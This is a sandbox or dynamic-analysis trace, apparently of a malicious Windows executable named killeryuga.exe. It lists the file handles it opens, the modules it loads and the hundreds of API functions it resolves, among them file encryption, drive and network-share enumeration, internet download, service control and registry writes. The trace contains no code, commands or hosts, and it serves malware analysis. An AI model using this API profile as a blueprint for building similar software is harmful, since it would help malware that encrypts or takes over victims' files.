File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75365235 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x753879f9 True 1
Fn
System Get Info type = Hardware Information True 249
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x7536435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x753649d7 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75361856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x7536435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x7536186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x75363519 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7537d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75367a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75361b00 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = RPCRT4.dll, base_address = 0x759b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeA, address_out = 0x759f3fc5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringA, address_out = 0x75a2d918 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringW, address_out = 0x759f1ee5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeW, address_out = 0x759d1635 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidCreate, address_out = 0x759cf48b True 1
Fn
Module Load module_name = MPR.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetEnumResourceW, address_out = 0x750d3058 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetOpenEnumW, address_out = 0x750d2f06 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetCloseEnum, address_out = 0x750d2dd6 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75d30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75d4ab49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x75d59197 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlW, address_out = 0x75dabe5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75d4b406 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoW, address_out = 0x75d55c75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlA, address_out = 0x75d730f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x75d5f18e True 1
Fn
Module Load module_name = WINMM.dll, base_address = 0x75090000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\winmm.dll, function = timeGetTime, address_out = 0x750926e0 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x77020000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x770345bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsA, address_out = 0x7705ad1a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x77033248 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindFileNameW, address_out = 0x7703bb71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7703a1b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendA, address_out = 0x7702d65e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendW, address_out = 0x770381ef True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x7537ce46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x75363c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x75365223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x753653c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x75364435 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x753617d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x75365a4b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75361b00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x7536103d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x7537c807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x75364259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x75361136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x75365371 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x7536186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75361282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeA, address_out = 0x7537ef75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x75361986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x7536588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x75365063 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x7536170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x7536492b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x753610ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x7538830d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FormatMessageW, address_out = 0x75364620 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpynW, address_out = 0x7538d556 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessA, address_out = 0x75361072 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7537d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x75363ed3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x75363f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x75382b7a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x753633a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x75365929 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x7536192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x75361700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x7536469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetShortPathNameA, address_out = 0x7538594d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x753659e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x753611c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x753611a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75361222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75361856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x75379af0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x75388baf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x7536168c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x7536183e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x753614b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x7538896c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x7538828e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexA, address_out = 0x75364c6b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x75363da5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75361410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x753689b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x75362d3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x75383102 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileA, address_out = 0x75365444 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x75382a9d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetPriorityClass, address_out = 0x7537cf28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75361809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x75363509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeProcess, address_out = 0x7537174d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75364950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x75365558 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersion, address_out = 0x75364467 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x753611f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x753634d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryA, address_out = 0x7538d526 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreW, address_out = 0x7537ca5a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x753634b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x7536110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x75363587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x753614fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x753611e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x753649ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x75361916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x753687c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x7538772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x753651cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x753651e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x75361725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x7536465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x753658a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x75361946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x75364d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77603002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesW, address_out = 0x753e425f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x7536495d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatW, address_out = 0x753834d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatW, address_out = 0x7537f481 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x75363bca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x753617b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x75407bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x75361328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x753634c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77611f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x7538d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x753e454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x7536e331 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x753614c9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x775fe026 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x775f22b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x775f2270 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x753651b3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x75363531 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x75364a6f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x75387aca True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x7538d1d4 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x75368a09 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x753e4691 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x776045f5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AreFileApisANSI, address_out = 0x753e40d1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75367a10 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x753614e9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x75361450 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x753617ec True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x75365189 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x7538d1a1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75364a5d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75365235 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x75364493 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x753654ee True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x7536dd0e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x7536179c True 1
Module Load module_name = USER32.dll, base_address = 0x75470000 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x75488a29 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x75491341 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x75489a55 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x754878e2 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostQuitMessage, address_out = 0x75489abb True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x754888f7 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x75491361 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x75487809 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x7548b17d True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x75490dfb True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = IsWindow, address_out = 0x75487136 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x75489679 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x75493559 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x776025dd True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x754dfd1e True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x754905ba True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x75488bff True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxW, address_out = 0x754dfd3f True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x7548787b True 1
Module Load module_name = ADVAPI32.dll, base_address = 0x76f50000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetHashParam, address_out = 0x76f5df7e True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CloseServiceHandle, address_out = 0x76f6369c True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x76f5df14 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x76f6157a True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x76f5df36 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x76f614d6 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x76f6469d True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x76f5df66 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ControlService, address_out = 0x76f77144 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x76f6468d True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenServiceW, address_out = 0x76f5ca4c True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x76f5e124 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x76f5df4e True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x76f7779b True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x76f5c532 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = QueryServiceStatus, address_out = 0x76f62a86 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x76f646ad True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenSCManagerW, address_out = 0x76f5ca64 True 1
Module Load module_name = SHELL32.dll, base_address = 0x75e30000 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderLocation, address_out = 0x75ebe141 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = CommandLineToArgvW, address_out = 0x75e49ee8 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75e51e46 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteA, address_out = 0x76077078 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListW, address_out = 0x75ec17bf True 1
Module Load module_name = ole32.dll, base_address = 0x75bd0000 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitialize, address_out = 0x75beb636 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeSecurity, address_out = 0x75bf7259 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x75c186d3 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75c19d0b True 1
Module Load module_name = OLEAUT32.dll, base_address = 0x76b50000 True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x76b53eae True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 8, address_out = 0x76b53ed5 True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 12, address_out = 0x76b55dee True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 201, address_out = 0x76b54af8 True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 6, address_out = 0x76b53e59 True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 200, address_out = 0x76b53f21 True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 2, address_out = 0x76b54642 True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 202, address_out = 0x76b5fd6b True 1
Module Load module_name = IPHLPAPI.DLL, base_address = 0x750f0000 True 1
Module Get Address module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x750f9263 True 1
Module Load module_name = WS2_32.dll, base_address = 0x76b10000 True 1
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 11, address_out = 0x76b1311b True 1
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 52, address_out = 0x76b27673 True 1
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 12, address_out = 0x76b1b131 True 1
Module Load module_name = DNSAPI.dll, base_address = 0x75020000 True 1
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsFree, address_out = 0x7502436b True 1
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsQuery_W, address_out = 0x7503572c True 1
Module Load module_name = CRYPT32.dll, base_address = 0x751a0000 True 1
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x751d5d77 True 1
Module Load module_name = msvcr100.dll, base_address = 0x74e80000 True 1
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x74e9c544 True 1
System Get Time type = System Time, time = 2019-03-24 05:39:12 (UTC) True 1
System Get Time type = Performance Ctr, time = 15773662834 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75364f2b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x7536359f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75361252 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75364208 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x75364d28 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x753e410b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x753e4195 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x7536d31f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x7537ee7e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x7761441c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7763c50e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7763c381 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x7537f088 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x776205d7 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7763ca24 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x775f0b8c True 1
